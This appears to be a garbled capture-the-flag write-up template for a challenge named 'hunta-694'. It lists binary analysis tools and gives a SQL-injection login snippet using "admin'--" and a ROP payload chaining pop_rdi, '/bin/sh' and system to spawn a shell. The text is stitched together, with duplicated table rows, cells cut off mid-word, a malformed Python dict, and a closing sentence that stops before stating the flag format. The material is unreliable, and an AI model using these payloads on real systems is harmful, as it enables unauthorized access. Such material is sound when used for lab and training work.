| Tool | Command | What to look for | |------|---------|------------------| | | Open the binary | Function names, main , suspicious strcpy , gets , system calls | | objdump | objdump -d -M intel hunta-694 | Disassembly for gadgets or vulnerable patterns | | radare2 | r2 -A hunta-694 → aaa | Auto‑analysis, function list ( afl ), cross‑references ( axt ) | | readelf | readelf -a hunta-694 | Section permissions ( .got , .plt ), NX/PIE/ASLR status | | nm | nm -D hunta-694 | Exported symbols (if any) | | checksec | checksec --file=hunta-694 | Stack canaries, RELRO, PIE, NX |
Then use the leaked address to compute libc_base and continue with a ROP chain. hunta-694
| Field | Value (to be filled) | |----------------------|----------------------| | | hunta‑694 | | Category | (e.g., Pwn / Web / Crypto / Reverse / Forensics) | | Points | (e.g., 200) | | Provided Files | hunta-694 (binary / zip / source code), README , Dockerfile , etc. | | Connection Details | nc huntu.ctf.example.com 1337 (if remote) | | Goal | Retrieve the flag in the format CTF... | | Tool | Command | What to look
import requests url = "http://challenge.ctf/hunta-694/login" payload = "username":"admin'--","password":"x" r = requests.post(url, data=payload) print(r.text) # Should reveal flag or a session cookie | import requests url = "http://challenge
rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload)
Once the exploit is successful, you typically receive a shell or a direct flag output. The flag format is usually: